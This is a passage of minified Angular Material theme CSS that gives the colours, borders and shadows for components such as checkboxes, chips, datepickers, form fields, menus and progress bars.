#0000001f}.mat-card-subtitle[_ngcontent-%COMP%]{color:#0000008a}.mat-checkbox-frame[_ngcontent-%COMP%]{border-color:#0000008a}.mat-checkbox-checkmark[_ngcontent-%COMP%]{fill:#f5f5f5}.mat-checkbox-checkmark-path[_ngcontent-%COMP%]{stroke:#f5f5f5!important}.mat-checkbox-mixedmark[_ngcontent-%COMP%]{background-color:#f5f5f5}.mat-checkbox-indeterminate.mat-primary[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .mat-checkbox-checked.mat-primary[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#2196f3}.mat-checkbox-indeterminate.mat-accent[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .mat-checkbox-checked.mat-accent[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-checkbox-indeterminate.mat-warn[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .mat-checkbox-checked.mat-warn[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#f44336}.mat-checkbox-disabled.mat-checkbox-checked[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .mat-checkbox-disabled.mat-checkbox-indeterminate[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#b0b0b0}.mat-checkbox-disabled[_ngcontent-%COMP%]:not(.mat-checkbox-checked)   .mat-checkbox-frame[_ngcontent-%COMP%]{border-color:#b0b0b0}.mat-checkbox-disabled[_ngcontent-%COMP%]   .mat-checkbox-label[_ngcontent-%COMP%]{color:#00000061}.mat-checkbox[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#000}.mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-primary   .mat-ripple-element[_ngcontent-%COMP%], .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-primary   .mat-ripple-element[_ngcontent-%COMP%]{background:#2196f3}.mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-accent   .mat-ripple-element[_ngcontent-%COMP%], .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-accent   .mat-ripple-element[_ngcontent-%COMP%]{background:#7b1fa2}.mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-warn   .mat-ripple-element[_ngcontent-%COMP%], .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-warn   .mat-ripple-element[_ngcontent-%COMP%]{background:#f44336}.mat-chip.mat-standard-chip[_ngcontent-%COMP%]{background-color:#e0e0e0;color:#000000de}.mat-chip.mat-standard-chip[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#000000de;opacity:.4}.mat-chip.mat-standard-chip[_ngcontent-%COMP%]:not(.mat-chip-disabled):active{box-shadow:0 3px 3px -2px #0003,0 3px 4px #00000024,0 1px 8px #0000001f}.mat-chip.mat-standard-chip[_ngcontent-%COMP%]:not(.mat-chip-disabled)   .mat-chip-remove[_ngcontent-%COMP%]:hover{opacity:.54}.mat-chip.mat-standard-chip.mat-chip-disabled[_ngcontent-%COMP%]{opacity:.4}.mat-chip.mat-standard-chip[_ngcontent-%COMP%]:after{background:black}.mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%]   .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.mat-table[_ngcontent-%COMP%]{background:white}.mat-table[_ngcontent-%COMP%]   thead[_ngcontent-%COMP%], .mat-table[_ngcontent-%COMP%]   tbody[_ngcontent-%COMP%], .mat-table[_ngcontent-%COMP%]   tfoot[_ngcontent-%COMP%], mat-header-row[_ngcontent-%COMP%], mat-row[_ngcontent-%COMP%], mat-footer-row[_ngcontent-%COMP%], [mat-header-row][_ngcontent-%COMP%], [mat-row][_ngcontent-%COMP%], [mat-footer-row][_ngcontent-%COMP%], .mat-table-sticky[_ngcontent-%COMP%]{background:inherit}mat-row[_ngcontent-%COMP%], mat-header-row[_ngcontent-%COMP%], mat-footer-row[_ngcontent-%COMP%], th.mat-header-cell[_ngcontent-%COMP%], td.mat-cell[_ngcontent-%COMP%], td.mat-footer-cell[_ngcontent-%COMP%]{border-bottom-color:#0000001f}.mat-header-cell[_ngcontent-%COMP%]{color:#0000008a}.mat-cell[_ngcontent-%COMP%], .mat-footer-cell[_ngcontent-%COMP%]{color:#000000de}.mat-calendar-arrow[_ngcontent-%COMP%]{fill:#0000008a}.mat-datepicker-toggle[_ngcontent-%COMP%], .mat-datepicker-content[_ngcontent-%COMP%]   .mat-calendar-next-button[_ngcontent-%COMP%], .mat-datepicker-content[_ngcontent-%COMP%]   .mat-calendar-previous-button[_ngcontent-%COMP%]{color:#0000008a}.mat-calendar-table-header-divider[_ngcontent-%COMP%]:after{background:rgba(0,0,0,.12)}.mat-calendar-table-header[_ngcontent-%COMP%], .mat-calendar-body-label[_ngcontent-%COMP%]{color:#0000008a}.mat-calendar-body-cell-content[_ngcontent-%COMP%], .mat-date-range-input-separator[_ngcontent-%COMP%]{color:#000000de;border-color:transparent}.mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){color:#00000061}.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-date-range-input-separator[_ngcontent-%COMP%]{color:#00000061}.mat-calendar-body-in-preview[_ngcontent-%COMP%]{color:#0000003d}.mat-calendar-body-today[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){border-color:#00000061}.mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-today[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){border-color:#0000002e}.mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(33,150,243,.2)}.mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(33,150,243,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(33,150,243,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#2196f366}.mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.cdk-keyboard-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .cdk-program-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#2196f34d}@media (hover: hover){.mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#2196f34d}}.mat-datepicker-content[_ngcontent-%COMP%]{box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f;background-color:#fff;color:#000000de}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(123,31,162,.2)}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(123,31,162,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(123,31,162,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#7b1fa266}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .cdk-keyboard-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .cdk-program-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#7b1fa24d}@media (hover: hover){.mat-datepicker-content.mat-accent[_ngcontent-%COMP%]   .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#7b1fa24d}}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(244,67,54,.2)}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(244,67,54,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   [dir=rtl][_ngcontent-%COMP%]   .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(244,67,54,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#f4433666}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .cdk-keyboard-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .cdk-program-focused[_ngcontent-%COMP%]   .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#f443364d}@media (hover: hover){.mat-datepicker-content.mat-warn[_ngcontent-%COMP%]   .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#f443364d}}.mat-datepicker-content-touch[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f}.mat-datepicker-toggle-active[_ngcontent-%COMP%]{color:#2196f3}.mat-datepicker-toggle-active.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.mat-datepicker-toggle-active.mat-warn[_ngcontent-%COMP%]{color:#f44336}.mat-date-range-input-inner[disabled][_ngcontent-%COMP%]{color:#00000061}.mat-dialog-container[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f;background:white;color:#000000de}.mat-divider[_ngcontent-%COMP%]{border-top-color:#0000001f}.mat-divider-vertical[_ngcontent-%COMP%]{border-right-color:#0000001f}.mat-expansion-panel[_ngcontent-%COMP%]{background:white;color:#000000de}.mat-expansion-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.mat-action-row[_ngcontent-%COMP%]{border-top-color:#0000001f}.mat-expansion-panel[_ngcontent-%COMP%]   .mat-expansion-panel-header.cdk-keyboard-focused[_ngcontent-%COMP%]:not([aria-disabled=true]), .mat-expansion-panel[_ngcontent-%COMP%]   .mat-expansion-panel-header.cdk-program-focused[_ngcontent-%COMP%]:not([aria-disabled=true]), .mat-expansion-panel[_ngcontent-%COMP%]:not(.mat-expanded)   .mat-expansion-panel-header[_ngcontent-%COMP%]:hover:not([aria-disabled=true]){background:rgba(0,0,0,.04)}@media (hover: none){.mat-expansion-panel[_ngcontent-%COMP%]:not(.mat-expanded):not([aria-disabled=true])   .mat-expansion-panel-header[_ngcontent-%COMP%]:hover{background:white}}.mat-expansion-panel-header-title[_ngcontent-%COMP%]{color:#000000de}.mat-expansion-panel-header-description[_ngcontent-%COMP%], .mat-expansion-indicator[_ngcontent-%COMP%]:after{color:#0000008a}.mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%]{color:#00000042}.mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%]   .mat-expansion-panel-header-title[_ngcontent-%COMP%], .mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%]   .mat-expansion-panel-header-description[_ngcontent-%COMP%]{color:inherit}.mat-expansion-panel-header[_ngcontent-%COMP%]{height:48px}.mat-expansion-panel-header.mat-expanded[_ngcontent-%COMP%]{height:64px}.mat-form-field-label[_ngcontent-%COMP%], .mat-hint[_ngcontent-%COMP%]{color:#0009}.mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{color:#2196f3}.mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-label.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-label.mat-warn[_ngcontent-%COMP%]{color:#f44336}.mat-focused[_ngcontent-%COMP%]   .mat-form-field-required-marker[_ngcontent-%COMP%]{color:#7b1fa2}.mat-form-field-ripple[_ngcontent-%COMP%]{background-color:#000000de}.mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:#2196f3}.mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple.mat-warn[_ngcontent-%COMP%]{background-color:#f44336}.mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid)   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#2196f3}.mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid).mat-accent   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#7b1fa2}.mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid).mat-warn   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#f44336}.mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-label.mat-accent[_ngcontent-%COMP%], .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]   .mat-form-field-required-marker[_ngcontent-%COMP%]{color:#f44336}.mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%], .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-ripple.mat-accent[_ngcontent-%COMP%]{background-color:#f44336}.mat-error[_ngcontent-%COMP%]{color:#f44336}.mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-hint[_ngcontent-%COMP%]{color:#0000008a}.mat-form-field-appearance-legacy[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-color:#0000006b}.mat-form-field-appearance-legacy.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-image:linear-gradient(to right,rgba(0,0,0,.42) 0%,rgba(0,0,0,.42) 33%,transparent 0%);background-size:4px 100%;background-repeat:repeat-x}.mat-form-field-appearance-standard[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-color:#0000006b}.mat-form-field-appearance-standard.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]{background-image:linear-gradient(to right,rgba(0,0,0,.42) 0%,rgba(0,0,0,.42) 33%,transparent 0%);background-size:4px 100%;background-repeat:repeat-x}.mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-flex[_ngcontent-%COMP%]{background-color:#0000000a}.mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-flex[_ngcontent-%COMP%]{background-color:#00000005}.mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]:before{background-color:#0000006b}.mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{color:#00000061}.mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%]:before{background-color:transparent}.mat-form-field-appearance-outline[_ngcontent-%COMP%]   .mat-form-field-outline[_ngcontent-%COMP%]{color:#0000001f}.mat-form-field-appearance-outline[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#000000de}.mat-form-field-appearance-outline.mat-focused[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#2196f3}.mat-form-field-appearance-outline.mat-focused.mat-accent[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#7b1fa2}.mat-form-field-appearance-outline.mat-focused.mat-warn[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%], .mat-form-field-appearance-outline.mat-form-field-invalid.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#f44336}.mat-form-field-appearance-outline.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%]{color:#00000061}.mat-form-field-appearance-outline.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-outline[_ngcontent-%COMP%]{color:#0000000f}.mat-icon.mat-primary[_ngcontent-%COMP%]{color:#2196f3}.mat-icon.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.mat-icon.mat-warn[_ngcontent-%COMP%]{color:#f44336}.mat-form-field-type-mat-native-select[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#0000008a}.mat-input-element[_ngcontent-%COMP%]:disabled, .mat-form-field-type-mat-native-select.mat-form-field-disabled[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#00000061}.mat-input-element[_ngcontent-%COMP%]{caret-color:#2196f3}.mat-input-element[_ngcontent-%COMP%]::placeholder{color:#0000006b}.mat-input-element[_ngcontent-%COMP%]::-moz-placeholder{color:#0000006b}.mat-input-element[_ngcontent-%COMP%]::-webkit-input-placeholder{color:#0000006b}.mat-input-element[_ngcontent-%COMP%]:-ms-input-placeholder{color:#0000006b}.mat-form-field.mat-accent[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]{caret-color:#7b1fa2}.mat-form-field.mat-warn[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%], .mat-form-field-invalid[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]{caret-color:#f44336}.mat-form-field-type-mat-native-select.mat-form-field-invalid[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#f44336}.mat-list-base[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%], .mat-list-base[_ngcontent-%COMP%]   .mat-list-option[_ngcontent-%COMP%]{color:#000000de}.mat-list-base[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{color:#0000008a}.mat-list-base[_ngcontent-%COMP%]   .mat-list-item-disabled[_ngcontent-%COMP%]{background-color:#eee;color:#00000061}.mat-list-option[_ngcontent-%COMP%]:hover, .mat-list-option[_ngcontent-%COMP%]:focus, .mat-nav-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:hover, .mat-nav-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:focus, .mat-action-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:hover, .mat-action-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]:focus{background:rgba(0,0,0,.04)}.mat-list-single-selected-option[_ngcontent-%COMP%], .mat-list-single-selected-option[_ngcontent-%COMP%]:hover, .mat-list-single-selected-option[_ngcontent-%COMP%]:focus{background:rgba(0,0,0,.12)}.mat-menu-panel[_ngcontent-%COMP%]{background:white}.mat-menu-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.mat-menu-item[_ngcontent-%COMP%]{background:transparent;color:#000000de}.mat-menu-item[disabled][_ngcontent-%COMP%], .mat-menu-item[disabled][_ngcontent-%COMP%]   .mat-menu-submenu-icon[_ngcontent-%COMP%], .mat-menu-item[disabled][_ngcontent-%COMP%]   .mat-icon-no-color[_ngcontent-%COMP%]{color:#00000061}.mat-menu-item[_ngcontent-%COMP%]   .mat-icon-no-color[_ngcontent-%COMP%], .mat-menu-submenu-icon[_ngcontent-%COMP%]{color:#0000008a}.mat-menu-item[_ngcontent-%COMP%]:hover:not([disabled]), .mat-menu-item.cdk-program-focused[_ngcontent-%COMP%]:not([disabled]), .mat-menu-item.cdk-keyboard-focused[_ngcontent-%COMP%]:not([disabled]), .mat-menu-item-highlighted[_ngcontent-%COMP%]:not([disabled]){background:rgba(0,0,0,.04)}.mat-paginator[_ngcontent-%COMP%]{background:white}.mat-paginator[_ngcontent-%COMP%], .mat-paginator-page-size[_ngcontent-%COMP%]   .mat-select-trigger[_ngcontent-%COMP%]{color:#0000008a}.mat-paginator-decrement[_ngcontent-%COMP%], .mat-paginator-increment[_ngcontent-%COMP%]{border-top:2px solid rgba(0,0,0,.54);border-right:2px solid rgba(0,0,0,.54)}.mat-paginator-first[_ngcontent-%COMP%], .mat-paginator-last[_ngcontent-%COMP%]{border-top:2px solid rgba(0,0,0,.54)}.mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-decrement[_ngcontent-%COMP%], .mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-increment[_ngcontent-%COMP%], .mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-first[_ngcontent-%COMP%], .mat-icon-button[disabled][_ngcontent-%COMP%]   .mat-paginator-last[_ngcontent-%COMP%]{border-color:#00000061}.mat-paginator-container[_ngcontent-%COMP%]{min-height:56px}.mat-progress-bar-background[_ngcontent-%COMP%]{fill:#c0ddf5}.mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#c0ddf5}.mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#2196f3}.mat-progress-bar.mat-accent[_ngcontent-%COMP%]   .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#d7c0e0}.mat-progress-bar.mat-accent[_ngcontent-%COMP%]   .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#d7c0e0}.mat-progress-bar.mat-accent[_ngcontent-%COMP%]   .mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#7b1fa2}.mat-progress-bar.mat-warn[_ngcontent-%COMP%]   .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#f5c9c5}.mat-progress-bar.mat-warn[_ngcontent-%COMP%]   .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#f5c9c5}.mat-progress-bar.mat-warn[_ngcontent-%COMP%]   